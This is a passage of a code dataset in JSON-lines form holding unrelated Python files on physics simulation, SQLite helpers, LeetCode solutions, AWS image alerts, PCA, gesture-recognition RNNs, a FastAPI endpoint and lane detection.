read_maintenance_reqs()","sub_path":"explore/read_attachments.py","file_name":"read_attachments.py","file_ext":"py","file_size_in_byte":26479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"283565402","text":"# Module to solve the Thomas-Fermi problem in 1D\n\nimport numpy as np\n\ndef create_K_matrix(x, E_scale=1.0, sigma=1.0, x_0 = 1.0):\n '''\n Input: \n x : discrete 1D grid\n E_scale : energy scale for the K matrix, default units is eV\n sigma : impact paramter to prevent blow up at the same point\n Output:\n K : matrix of size x.size times x.size\n\n K(x1,x2) = E_scale / sqrt((x1 - x2)^2 + sigma^2)\n '''\n r = np.abs(x[:,np.newaxis] - x)\n K = E_scale/np.sqrt(r**2 + sigma**2)*np.exp(-r/x_0)\n return K\n \ndef create_A_matrix(x,V,K,mu_l,N_dot,mask,dot_info,lead_info):\n '''\n Convinience function\n Input:\n x : discrete 1D grid\n V : potential\n K : Coulomb interaction matrix between two points\n mask : array specifying the nature of each point 'l1','d','b' or 'l2'\n dot_info : information about number of dots and their start and end points\n Output:\n A : matrix A used in solution of TF, A z = b \n '''\n\n #set up the A matrix\n N_grid = len(x)\n # 2 are leads\n N_D = len(dot_info)\n N_islands = N_D + 2\n \n N_bar = len(filter(lambda x: x == 'b',mask))\n N_A = N_grid + N_islands + N_bar\n A = np.zeros([N_A,N_A])\n\n A[:N_grid,:N_grid] = K\n # bottom left part\n B = np.zeros((N_D,N_grid))\n # constraint for sum of electron density over a dot\n for i in range(N_D):\n B[i,dot_info[i][0]:dot_info[i][1] + 1] = 1\n\n # set the sum and mu_dot constraint equations\n A[N_grid:N_grid + N_D,:N_grid] = B\n A[:N_grid,N_grid:N_grid + N_D] = -B.T\n\n for i in range(len(lead_info)):\n # sum over leads\n A[N_grid + N_D + i,lead_info[i][0]:lead_info[i][1] + 1] = 1\n # minus the unkown electron number on the leads\n A[N_grid + N_D + i,N_grid + N_D + i] = -1\n \n # barrier lagrange multiplier unknowns\n bar_constraint = 0\n for i in range(len(mask)):\n if mask[i] == 'b':\n A[i,N_grid + N_islands + bar_constraint] = -1\n bar_constraint += 1\n # barrier n = 0\n bar_constraint = 0\n for i in range(len(mask)): \n if mask[i] == 'b':\n A[N_grid + N_islands + bar_constraint,i] = 1 \n bar_constraint += 1\n return A\n\ndef create_b_matrix(x,V,K,mu_l,N_dot,mask,dot_info,lead_info):\n '''\n Convinience function\n Input:\n x : discrete 1D grid\n V : potential\n K : Coulomb interaction matrix between two points\n mask : array specifying the nature of each point 'l1','d','b' or 'l2'\n dot_info : information about number of dots and their start and end points\n lead_info : information about leads and their start and end points\n mu_l : (mu_L1, mu_L2) tuple with the lead potentials\n N_dot: vector with number of electrons in each dot, can be of size 0 i.e no dot\n Output:\n b : vector b used in solution of TF, A z = b \n '''\n N_grid = len(x)\n # 2 are leads\n N_D = len(dot_info)\n N_islands = N_D + 2\n N_bar = len(filter(lambda x: x == 'b',mask))\n \n N_A = N_grid + N_islands + N_bar\n\n # set up the RHS\n b = np.zeros(N_A)\n b[:N_grid] = -V\n\n # lead potentials on the RHS\n # notice the all essential +=\n for i in range(len(lead_info)):\n b[lead_info[i][0]:lead_info[i][1] + 1] += mu_l[i] \n\n b[N_grid:N_grid+N_D] = N_dot\n return b\n\ndef solve_thomas_fermi(x,V,K,mu_l,N_dot):\n '''\n Input:\n x : discrete 1D grid\n V : potential\n K : Coulomb interaction matrix between two points\n mu_l : (mu_L1, mu_L2) tuple with the lead potentials\n N_dot: vector with number of electrons in each dot, can be of size 0 i.e no dot\n Output:\n (n, mu) where\n n : electronic charge density as a function of x\n mu : chemical potential as a function of x\n mu(x) = mu_L when x in leads\n \n Solves the Thomas-Fermi equation V - mu + K n = 0 along with the constraint that integral of electron density in a dot is a constant and electron density in the barrier region is zero.\n '''\n #solve the equation A z = b\n # z = (n mu)^T\n N_grid = len(x)\n \n mu_avg = 0.5*(mu_l[0] + mu_l[1])\n mask = dot_classifier.get_mask(x,V,K,mu_avg)\n # dictionary index by dot number, gives [dot_begin_index,dot_end_index]\n dot_info = dot_classifier.get_dot_info(mask)\n lead_info = dot_classifier.get_lead_info(mask)\n \n A = create_A_matrix(x,V,K,mu_l,N_dot,mask,dot_info,lead_info)\n b = create_b_matrix(x,V,K,mu_l,N_dot,mask,dot_info,lead_info)\n z = np.linalg.solve(A,b)\n\n # return the electron density and the dot chemical potentials\n n,mu = z[:N_grid],z[N_grid:N_grid + len(dot_info)]\n # also add the lead chemical potentials to simplify further calculations\n mu = np.concatenate(([mu_l[0]],mu,[mu_l[1]]))\n return n,mu\n \ndef calculate_thomas_fermi_energy(V,K,n,mu,N_dot):\n '''\n Input: \n V : potential profile\n K : Coulomb interaction matrix \n n : electorn density\n mu : chemical potenial profile, includes leads and dot potentials \n Output:\n E : Thomas-Fermi energy\n\n E = V n + 1/2 n K n\n '''\n E = np.sum(V*n) + 0.5 * np.sum(n*np.dot(K,n.T))\n return E\n\n\n \n","sub_path":"junk/simple_models/thomas_fermi.py","file_name":"thomas_fermi.py","file_ext":"py","file_size_in_byte":5267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"605211768","text":"import sqlite3\nfrom util import to_text\n\n__EXT_SQL__ = \"\"\"\nSELECT * FROM sqlite_master WHERE name =? and type='table'; \n\"\"\"\n\n__GET_SQL__ = \"\"\"\nSELECT value FROM TABLENAME WHERE id=? LIMIT 1;\n\"\"\"\n__SET_SQL__ = \"\"\"\nINSERT OR REPLACE INTO TABLENAME (id, value) VALUES (?,?);\n\"\"\"\n__DEL_SQL__ = \"\"\"\nDELETE FROM TABLENAME WHERE id=?;\n\"\"\"\n\nclass BunHelper():\n def __init__(self, date_string, filename='.\\data\\hwk\\hwk.sqlite3'):\n \"\"\"\n 传入的日期用以建立表格。此处需要注意,默认格式为\n 20180409\n \"\"\"\n\n self.db = sqlite3.connect(filename, check_same_thread=False)\n self.db.text_factory = str\n self.tbname=\"HWD\"+date_string\n self.get_sql_str = __GET_SQL__.replace('TABLENAME',self.tbname)\n self.set_sql_str = __SET_SQL__.replace('TABLENAME',self.tbname)\n self.del_sql_str =__DEL_SQL__.replace('TABLENAME',self.tbname)\n \n session_json = self.db.execute(\n __EXT_SQL__, (self.tbname, )\n ).fetchone()\n if session_json is None:\n self.ext = 0\n else:\n self.ext = 1\n \n def is_ext(self):\n return self.ext\n \n def get(self, id):\n \"\"\"\n 根据 id 获取数据。\n :param id: 要获取的数据的 id\n :return: 返回取到的数据,如果是空则返回一个空的 ``dict`` 对象\n \"\"\"\n session_json = self.db.execute(\n self.get_sql_str, (id, )\n ).fetchone()\n if session_json is None:\n return \"\"\n return to_text(session_json[0])\n\n def set(self, id, value):\n \"\"\"\n 根据 id 写入数据。\n :param id: 要写入的 id\n :param value: 要写入的数据,可以是一个 ``dict`` 对象\n \"\"\"\n self.db.execute(\n self.set_sql_str,\n (id, value)\n )\n self.db.commit()\n\n def delete(self, id):\n \"\"\"\n 根据 id 删除数据。\n :param id: 要删除的数据的 id\n \"\"\"\n self.db.execute(self.del_sql_str, (id, ))\n self.db.commit()\n \n def checkunsubmit(self, ids):\n unsubmitlist=[]\n for id in ids:\n if(len(self.get(id))==0):\n unsubmitlist.append(id)\n return unsubmitlist\n \n","sub_path":"scbun_helper.py","file_name":"scbun_helper.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"46709700","text":"import re\r\nstr=input()\r\ndateRegex = re.compile(r'(\\d{2})/(\\d{2})/(\\d{4})')\r\nmo =dateRegex.search(str)\r\nif mo==None:\r\n print(\"Invalid format\")\r\nelse:\r\n date = int(mo.group(1))\r\n month = int(mo.group(2))\r\n year = int(mo.group(3))\r\n\r\n if year%4==0:\r\n if year%100==0:\r\n if year%400==0:\r\n feb=29\r\n else:\r\n feb=28\r\n else:\r\n feb=29\r\n else:\r\n feb=28\r\n dmax=[31,feb,31,30,31,30,31,31,30,31,30,31]\r\n if date>dmax[month-1]:\r\n print(\"Invalid date\")\r\n elif month>12:\r\n print(\"Invalid date\")\r\n elif year>=3000 or year<1000:\r\n print(\"Invalid date\")\r\n else:\r\n print(\"Valid date\")\r\n \r\n","sub_path":"Chapter-7/Date_Detection.py","file_name":"Date_Detection.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"178337349","text":"# FB tag frequency top 100\n# https://leetcode.com/problems/remove-invalid-parentheses/\n# remove the minimum number of invalid parentheses, \n# return all the possible results in any order\n\nclass Solution:\n def removeInvalidParentheses(self, s: str) -> List[str]:\n def isValid(st: str) -> bool:\n unpaired = 0\n for char in st:\n if char == \"(\":\n unpaired += 1\n if char == \")\":\n if unpaired < 1:\n return False\n else:\n unpaired -= 1\n return True if unpaired == 0 else False\n \n # record indices of left/right parentheses\n left_i = []\n right_i = []\n for i, char in enumerate(s):\n if char == \"(\": left_i.append(i)\n if char == \")\": right_i.append(i)\n \n # record the number of left/right parentheses to remove\n left_unpaired = 0\n right_unpaired = 0\n for char in s:\n if char == \"(\":\n left_unpaired += 1\n if char == \")\":\n if left_unpaired < 1:\n right_unpaired += 1\n else:\n left_unpaired -= 1\n \n # since known number of left/right parentheses to remove, try permutations\n left_comb = list(itertools.combinations(left_i, left_unpaired))\n right_comb = list(itertools.combinations(right_i, right_unpaired))\n product = list(itertools.product(left_comb, right_comb))\n\n result = []\n for prd in product:\n arr = list(s)\n indices_rm = []\n for i in prd[0]:\n indices_rm.append(i)\n for j in prd[1]:\n indices_rm.append(j)\n \n # For multiple pop/delete with known indices, first do reverse sorting!\n indices_rm = sorted(indices_rm, reverse=True)\n for index in indices_rm:\n arr.pop(index)\n \n output = \"\".join(arr)\n if isValid(output):\n result.append(output)\n \n return set(result)","sub_path":"leetcode/301_RemoveInvalidParentheses.py","file_name":"301_RemoveInvalidParentheses.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"539727640","text":"import boto3\nimport datetime\nimport json\nimport threading\nimport cv2\nimport os\n\nTOPIC_ARN = 'arn:aws:sns:eu-central-1:972411866948:predator_sns'\nBUCKET = 'predator-rpi-bucket'\nIMAGE_UPLOAD_TIME_SEC = 5\nSNS_NOTIFICATION_TIME_SEC = 300\nBASE_PATH = '/tmp/'\n\n\ndef send_notification(subject, message):\n client = boto3.client('sns')\n client.publish(\n TopicArn=TOPIC_ARN,\n Message=message,\n Subject=subject\n )\n\n\ndef upload_image_s3(image_path, file_key):\n s3 = boto3.resource('s3')\n bucket = s3.Bucket(BUCKET)\n bucket.upload_file(image_path, file_key)\n\n\ndef save_and_upload_image(image, x):\n path = \"predator_capture_{}.jpg\".format(str(datetime.datetime.now()))\n os_path = \"{}{}\".format(BASE_PATH, path)\n cv2.imwrite(os_path, image)\n upload_image_s3(os_path, path)\n delete_image(os_path)\n\n\ndef delete_image(path):\n os.remove(path)\n\n\nclass AWSPredator:\n def __init__(self):\n self.last_s3_image_time = None\n self.last_sns_time = None\n\n def detected_movement(self, image):\n now = datetime.datetime.now()\n if self.last_s3_image_time is None or (now-self.last_s3_image_time).total_seconds() > IMAGE_UPLOAD_TIME_SEC:\n self.last_s3_image_time = now\n t = threading.Thread(target=save_and_upload_image, args=(image, None))\n t.start()\n\n if self.last_sns_time is None or (now-self.last_sns_time).total_seconds() > SNS_NOTIFICATION_TIME_SEC:\n self.last_sns_time = now\n t = threading.Thread(target=send_notification, args=(\"Predator detected movement!\", json.dumps({\n \"Message\": \"Predator detected movement\",\n \"Time\": str(now),\n })))\n t.start()\n","sub_path":"utils/aws_utils.py","file_name":"aws_utils.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"544735610","text":"## Make sure to install and import necessary modules first\n\nimport pandas as pd\nimport numpy as np\nimport random as rd\nfrom sklearn.decomposition import PCA\nfrom sklearn import preprocessing\nimport matplotlib.pyplot as plt\n\n# Loading the data\n# Note: This is already a preprocessed data.\n\ndata = pd.read_csv('./pca_example_dataset.csv')\n\n## In this example, the data is in a data frame called data.\n## Columns represent different samples (i.e. cells) that may have been under specific conditions to alter gene expression.\n## Rows represent genes from these different samples.\n\n# Checking the head (First 5 columns) and shape of the data.\nprint(data.head())\nprint(data.shape)\n\n# Drop geneid before applying PCA as it has no significance in statistics.\nd = data.drop(\"geneid\", 1)\nd.head() # checking if geneid is removed or not.\nd.shape\n\n# First center and scale the data\nscaled_data = preprocessing.scale(d.T)\n\npca = PCA() # create a PCA object\npca.fit(scaled_data) # do the statistics\npca_data = pca.transform(scaled_data) # get PCA coordinates for scaled_data\n\n# Drawing a scree plot and a PCA plot:\n\n# The following code constructs the Scree plot\nper_var = np.round(pca.explained_variance_ratio_ * 100, decimals=1)\nlabels = ['PC' + str(x) for x in range(1, len(per_var) + 1)]\n\nplt.bar(x=range(1, len(per_var) + 1), height=per_var, tick_label=labels)\nplt.ylabel('Percentage of Explained Variance')\nplt.xlabel('Principal Component')\nplt.title('Scree Plot')\nplt.show()\n\n# the following code creates PC1 and PC2 in a 2D PCA plot:\npca_df = pd.DataFrame(pca_data, columns=labels)\n\nplt.scatter(pca_df.PC1, pca_df.PC2)\nplt.title('My PCA Graph')\nplt.xlabel('PC1 - {0}%'.format(per_var[0]))\nplt.ylabel('PC2 - {0}%'.format(per_var[1]))\n\nfor sample in pca_df.index:\n plt.annotate(sample, (pca_df.PC1.loc[sample], pca_df.PC2.loc[sample]))\n\nplt.show()\n\n# Determine which genes had the biggest influence on PC1:\n\n## get the name of the top 10 measurements (genes) that contribute\n## most to pc1.\n## first, get the loading scores\nloading_scores = pd.Series(pca.components_[0])\n\n## now sort the loading scores based on their magnitude\nsorted_loading_scores = loading_scores.abs().sort_values(ascending=False)\n\n# get the names of the top 10 genes\ntop_10_genes = sorted_loading_scores[0:10].index.values\nprint(top_10_genes)\n\n","sub_path":"PCA_analysis.py","file_name":"PCA_analysis.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"145758956","text":"from keras.layers import Bidirectional, Concatenate, Permute, Dot, Input, LSTM, Multiply\nfrom keras.layers import RepeatVector, Dense, Activation, Lambda ,Flatten\nfrom keras.optimizers import Adam\nfrom keras.utils import to_categorical\nfrom keras.models import load_model, Model\nimport keras.backend as K\nimport numpy as np\nfrom keras.models import Sequential\nimport random\nfrom nmt_utils import *\nimport matplotlib.pyplot as plt\nfrom keras.models import model_from_json\nfrom br_util import *\nfrom numpy import argmax\nfrom loader_v2 import *\n#get_ipython().magic('matplotlib inline')\nnp.random.seed(12345)\nno_pers=3 #no of persons to collect\n\nX_train,Y_train,X_test,Y_test,f,s=lo_data2()\nin_v_dic,v_in_dic=load_dict()\n\n\"\"\"\nX : input frames as 3 dimension\nY : 1D list of output labels\nf : number of features per frame (mostly 426 features)\ng : number of input gestures (length of the training dataset)\ns : maximum number of sequences per gesture (also it will be no. inputs for RNN)\nin_v_dic : index to vocab dictionary\nv_in_dic : vocab to index dictionary\n\"\"\"\nprint (Y_train[0])\n\nprint(\"index to vocab\")\nprint(in_v_dic)\n\nprint(\"vocab to index\")\nprint(v_in_dic)\nm=X_train.shape[0]\nTx=s\nTy=1\nYoh_train=preprocess_data(Y_train,v_in_dic,Ty)\nYoh_test=preprocess_data(Y_test,v_in_dic,Ty)\n\nprint(Yoh_train.shape)\n'''\nprint(Y[1])\nprint(Yoh[1])\nprint(Y[200])\nprint(Yoh[200])\nprint(Y[500])\nprint(Yoh[500])\nprint(Y[1500])\nprint(Yoh[1500])\n\nprint(argmax(Yoh[1])) # from one hot vector to integer\n'''\n\nprint(\"X.shape:\", X_train.shape)\nprint(\"Y.shape:\", Y_train.shape)\nprint(\"Yoh.shape:\", Yoh_train.shape)\n\n\n'''\nindex = 0\nprint(\"Source date:\", dataset[index][0])\nprint(\"Target date:\", dataset[index][1])\nprint()\nprint(\"Source after preprocessing (indices):\", X[index])\nprint(\"Target after preprocessing (indices):\", Y[index])\nprint()\nprint(\"Source after preprocessing (one-hot):\", Xoh[index])\nprint(\"Target after preprocessing (one-hot):\", Yoh[index])\n'''\n\n\n# Defined shared layers as global variables\nrepeator = RepeatVector(Tx)\nconcatenator = Concatenate(axis=-1)\ndensor = Dense(1, activation = \"relu\")\nactivator = Activation(softmax, name='attention_weights') # We are using a custom softmax(axis = 1) loaded in this notebook\ndotor = Dot(axes = 1)\n\n\n\ndef one_step_attention(a, s_prev):\n \"\"\"\n Performs one step of attention: Outputs a context vector computed as a dot product of the attention weights\n \"alphas\" and the hidden states \"a\" of the Bi-LSTM.\n\n Arguments:\n a -- hidden state output of the Bi-LSTM, numpy-array of shape (m, Tx, 2*n_a)\n s_prev -- previous hidden state of the (post-attention) LSTM, numpy-array of shape (m, n_s)\n\n Returns:\n context -- context vector, input of the next (post-attetion) LSTM cell\n \"\"\"\n\n ### START CODE HERE ###\n # Use repeator to repeat s_prev to be of shape (m, Tx, n_s) so that you can concatenate it with all hidden states \"a\" ( 1 line)\n s_prev = repeator(s_prev)\n # Use concatenator to concatenate a and s_prev on the last axis ( 1 line)\n concat = concatenator([s_prev,a])\n # Use densor to propagate concat through a small fully-connected neural network to compute the \"energies\" variable e. (1 lines)\n\n e = densor(concat)\n # Use activator and e to compute the attention weights \"alphas\" ( 1 line)\n alphas = activator(e)\n # Use dotor together with \"alphas\" and \"a\" to compute the context vector to be given to the next (post-attention) LSTM-cell ( 1 line)\n context = dotor([alphas,a])\n ### END CODE HERE ###\n\n return context\n\n\n# You will be able to check the expected output of `one_step_attention()` after you've coded the `model()` function.\n\n# **Exercise**: Implement `model()` as explained in figure 2 and the text above. Again, we have defined global layers that will share weights to be used in `model()`.\n\n# In[8]:\n\nn_a = 64\nn_s = 128\npost_activation_LSTM_cell = LSTM(n_s, return_state = True)\noutput_layer = Dense(len(v_in_dic), activation=softmax)\n\n\n# Now you can use these layers $T_y$ times in a `for` loop to generate the outputs, and their parameters will not be reinitialized. You will have to carry out the following steps:\n#\n# 1. Propagate the input into a [Bidirectional](https://keras.io/layers/wrappers/#bidirectional) [LSTM](https://keras.io/layers/recurrent/#lstm)\n# 2. Iterate for $t = 0, \\dots, T_y-1$:\n# 1. Call `one_step_attention()` on $[\\alpha^{},\\alpha^{}, ..., \\alpha^{}]$ and $s^{}$ to get the context vector $context^{}$.\n# 2. Give $context^{}$ to the post-attention LSTM cell. Remember pass in the previous hidden-state $s^{\\langle t-1\\rangle}$ and cell-states $c^{\\langle t-1\\rangle}$ of this LSTM using `initial_state= [previous hidden state, previous cell state]`. Get back the new hidden state $s^{}$ and the new cell state $c^{}$.\n# 3. Apply a softmax layer to $s^{}$, get the output.\n# 4. Save the output by adding it to the list of outputs.\n#\n# 3. Create your Keras model instance, it should have three inputs (\"inputs\", $s^{<0>}$ and $c^{<0>}$) and output the list of \"outputs\".\n\n# In[9]:\n\n# GRADED FUNCTION: model\n\ndef model(Tx, Ty, n_a, n_s, human_vocab_size, machine_vocab_size):\n \"\"\"\n Arguments:\n Tx -- length of the input sequence\n Ty -- length of the output sequence\n n_a -- hidden state size of the Bi-LSTM\n n_s -- hidden state size of the post-attention LSTM\n human_vocab_size -- size of the python dictionary \"human_vocab\"\n machine_vocab_size -- size of the python dictionary \"machine_vocab\"\n\n Returns:\n model -- Keras model instance\n \"\"\"\n\n # Define the inputs of your model with a shape (Tx,)\n # Define s0 and c0, initial hidden state for the decoder LSTM of shape (n_s,)\n X = Input(shape=(Tx, human_vocab_size))\n s0 = Input(shape=(n_s,), name='s0')\n c0 = Input(shape=(n_s,), name='c0')\n s = s0\n c = c0\n\n # Initialize empty list of outputs\n outputs = []\n\n ### START CODE HERE ###\n\n # Step 1: Define your pre-attention Bi-LSTM. Remember to use return_sequences=True. ( 1 line)\n #a = Bidirectional(LSTM(n_a,return_sequences=True)([X,s0]))\n\n a = Bidirectional(LSTM(n_a, return_sequences=True))(X)\n\n # Step 2: Iterate for Ty steps\n for t in range(Ty):\n\n # Step 2.A: Perform one step of the attention mechanism to get back the context vector at step t ( 1 line)\n context = one_step_attention(a, s)\n\n # Step 2.B: Apply the post-attention LSTM cell to the \"context\" vector.\n # Don't forget to pass: initial_state = [hidden state, cell state] ( 1 line)\n s, _, c = post_activation_LSTM_cell(initial_state = [s, c] , inputs=context)\n\n # Step 2.C: Apply Dense layer to the hidden state output of the post-attention LSTM ( 1 line)\n\n out = output_layer(s)\n\n # Step 2.D: Append \"out\" to the \"outputs\" list (1 line)\n outputs.append(out)\n\n # Step 3: Create model instance taking three inputs and returning the list of outputs. (1 line)\n\n model = Model(inputs=[X,s0,c0],outputs=outputs)\n\n ### END CODE HERE ###\n\n return model\n\n\n# Run the following cell to create your model.\n\n# In[10]:\n\nmodel = model(Tx, Ty, n_a, n_s, f, len(v_in_dic))\n\n\n# Let's get a summary of the model to check if it matches the expected output.\n\n# In[11]:\n\nmodel.summary()\n\n\n### START CODE HERE ### (2 lines)\nopt = Adam(lr=0.005, beta_1=0.9, beta_2=0.999, decay=0.01)\nmodel.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['accuracy'])\n### END CODE HERE ###\n\n\n# The last step is to define all your inputs and outputs to fit the model:\n# - You already have X of shape $(m = 10000, T_x = 30)$ containing the training examples.\n# - You need to create `s0` and `c0` to initialize your `post_activation_LSTM_cell` with 0s.\n# - Given the `model()` you coded, you need the \"outputs\" to be a list of 11 elements of shape (m, T_y). So that: `outputs[i][0], ..., outputs[i][Ty]` represent the true labels (characters) corresponding to the $i^{th}$ training example (`X[i]`). More generally, `outputs[i][j]` is the true label of the $j^{th}$ character in the $i^{th}$ training example.\n\n# In[ ]:\n\ns0 = np.zeros((m, n_s))\nc0 = np.zeros((m, n_s))\n#outputs = list(Yoh.swapaxes(0,1))\n#print(outputs.shape)\n\n\n# Let's now fit the model and run it for one epoch.\n\n# In[ ]:\nprint(X_train.shape)\nmodel.fit([X_train, s0, c0], Yoh_train, epochs=150, batch_size=50)\n#model.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['accuracy'])\n\n#from keras.models import load_model\nmodel.save('models\\\\model_2.h5')\nmodel.save_weights('models\\\\model_w_2.h5')\n\n'''\nmodel = load_model('my_model.h5')\nmodel.load_weights('my_model_weights.h5')\nmodel.load_weights('my_model_weights.h5', by_name=True)\n'''\n\n\n\n'''\nEXAMPLES = ['3 May 1979', '5 April 09', '21th of August 2016', 'Tue 10 Jul 2007', 'Saturday May 9 2018', 'March 3 2001', 'March 3rd 2001', '1 March 2001']\nfor example in EXAMPLES:\n\n source = string_to_int(example, Tx, human_vocab)\n source = np.array(list(map(lambda x: to_categorical(x, num_classes=len(human_vocab)), source))).swapaxes(0,1)\n prediction = model.predict([source, s0, c0])\n prediction = np.argmax(prediction, axis = -1)\n output = [inv_machine_vocab[int(i)] for i in prediction]\n\n print(\"source:\", example)\n print(\"output:\", ''.join(output))\n\n\n# You can also change these examples to test with your own examples. The next part will give you a better sense on what the attention mechanism is doing--i.e., what part of the input the network is paying attention to when generating a particular output character.\n'''\n\n\nmodel.summary()\nb=X_test.shape[0]\nst0 = np.zeros((b, n_s))\nct0 = np.zeros((b, n_s))\nprint(model.evaluate([X_test,st0,ct0], Yoh_test, verbose=0))\n\n\n\"\"\"\n#z=X[1000].reshape(1,s,f)\nz=X[1000:1060,:,:]\nprediction = model.predict([z,s0,c0])\n\n#print(prediction)\n\nprint(Y[1000:1060])\n#print(X[1])\nprediction = np.argmax(prediction, axis = -1)\nou = [in_v_dic[int(i)] for i in prediction]\nprint(ou)\n\nz=X[400:450,:,:]\nprediction = model.predict([z,s0,c0])\n\nprint(Y[400:450])\n#print(X[1])\nprediction = np.argmax(prediction, axis = -1)\nou = [in_v_dic[int(i)] for i in prediction]\nprint(ou)\n\n\nz=X[1890:1905,:,:]\nprediction = model.predict([z,s0,c0])\n\nprint(Y[1890:1905])\n#print(X[1])\nprediction = np.argmax(prediction, axis = -1)\nou = [in_v_dic[int(i)] for i in prediction]\nprint(ou)\n\"\"\"\n","sub_path":"rnn/RNN.py","file_name":"RNN.py","file_ext":"py","file_size_in_byte":10470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"43306789","text":"# -*- encoding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\t\n# Copyright (C) 2004-2009 Tiny SPRL (). All Rights Reserved\n# $Id$\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nimport gtk\nfrom gtk import glade\nimport gobject\nimport gettext\nimport pprint\n\n#from view_tree import parse\nimport rpc\n\n\nfields_list_type = {\n 'checkbox': gobject.TYPE_BOOLEAN,\n 'integer': gobject.TYPE_INT,\n 'float': gobject.TYPE_FLOAT\n}\n\nclass win_list(object):\n def __init__(self, model, sel_multi=True, context={}, search=False):\n self.sel_multi = sel_multi\n self.context = context\n self.context.update(rpc.session.context)\n\n self.model_name = model\n view = rpc.session.rpc_exec_auth('/object', 'execute', model, 'fields_view_get', False, 'tree', context)\n self.view_data = view\n\n self.tree = widget.tree(view['arch'], view['fields'], model, sel_multi=sel_multi, search=search)\n self.tree.context = context\n self.fields = view['fields']\n self.widget = self.tree.widget\n self.view = self.tree.widget\n self.fields_order = self.tree.fields_order\n\n def destroy(self):\n self.tree.destroy()\n del self.fields_order\n del self.widget\n del self.view\n\n def reload(self, ids):\n res = rpc.session.rpc_exec_auth('/object', 'execute', self.model_name, 'read', ids, self.fields_order, self.context)\n self.tree.value = res\n\n def sel_pos_set(self, num):\n sel = self.view.get_selection()\n sel.unselect_all()\n sel.select_path((num,))\n self.view.scroll_to_cell((num,))\n\n def sel_ids_get(self):\n return self.tree.sel_ids_get()\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n\n","sub_path":"bin/modules/gui/window/win_list.py","file_name":"win_list.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"271874122","text":"from typing import List\n\nfrom fastapi import Depends, FastAPI, HTTPException\nfrom sqlalchemy.orm import Session\n\nfrom auth import models, schemas, handlers\nfrom auth.database import SessionLocal, engine\n\nmodels.Base.metadata.create_all(bind=engine)\n\napp = FastAPI()\n\n\n# Dependency\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n\n\n@app.post(\"/users/\", response_model=schemas.UserShow)\ndef create_user(user: schemas.UserCreate, db: Session = Depends(get_db)):\n db_instance = handlers.user_info_by_username(db, username= user.username)\n if db_instance:\n raise HTTPException(status_code=400, detail=\"User already registered\")\n return handlers.create_user(db, user)\n\n\n@app.get(\"/users/\")\ndef get_users(start: int = 0, end: int = 100, db: Session = Depends(get_db)):\n return handlers.user_info_all(db, skip=start, limit=end)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"237828686","text":"###\n# Time Complexity: O(n)\n# Space Complexity: O(n)\n##\nclass Solution(object):\n def findMaxLength(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if not nums:\n return 0\n d = {0 : -1}\n accu = 0\n max_len = 0\n for i, num in enumerate(nums):\n accu += num if num == 1 else -1\n if accu in d:\n max_len = max(max_len, i - d[accu])\n else:\n d[accu] = i\n return max_len\n ","sub_path":"MyLeetCode/FB/Contiguous Array.py","file_name":"Contiguous Array.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"271865107","text":"import torch.nn as nn\nimport torch\nimport torch.nn.functional as F\n\nfrom lanedet.runner.registry import TRAINER\nfrom .losses.dice_loss import dice_loss\nfrom .losses.focal_loss import SoftmaxFocalLoss\n\n@TRAINER.register_module\nclass RESA(nn.Module):\n def __init__(self, cfg):\n super(RESA, self).__init__()\n self.cfg = cfg\n weights = torch.ones(cfg.num_classes)\n weights[0] = cfg.bg_weight\n weights = weights.cuda()\n self.criterion = torch.nn.NLLLoss(ignore_index=self.cfg.ignore_label,\n weight=weights).cuda()\n self.criterion_exist = torch.nn.BCEWithLogitsLoss().cuda()\n self.focal_loss = SoftmaxFocalLoss(2.)\n\n def forward(self, net, batch):\n output = net(batch['img'])\n\n loss_stats = {}\n loss = 0.\n\n seg_loss = self.criterion(F.log_softmax(\n output['seg'], dim=1), batch['label'].long())\n # target = F.one_hot(batch['label'], num_classes=self.cfg.num_classes).permute(0, 3, 1, 2)\n # seg_loss = dice_loss(F.softmax(\n # output['seg'], dim=1)[:, 1:], target[:, 1:]) * self.cfg.seg_loss_weight\n loss += seg_loss\n loss_stats.update({'seg_loss': seg_loss})\n\n if 'exist' in output:\n exist_loss = 0.1 * \\\n self.criterion_exist(output['exist'], batch['exist'].float())\n loss += exist_loss\n loss_stats.update({'exist_loss': exist_loss})\n\n ret = {'loss': loss, 'loss_stats': loss_stats}\n\n return 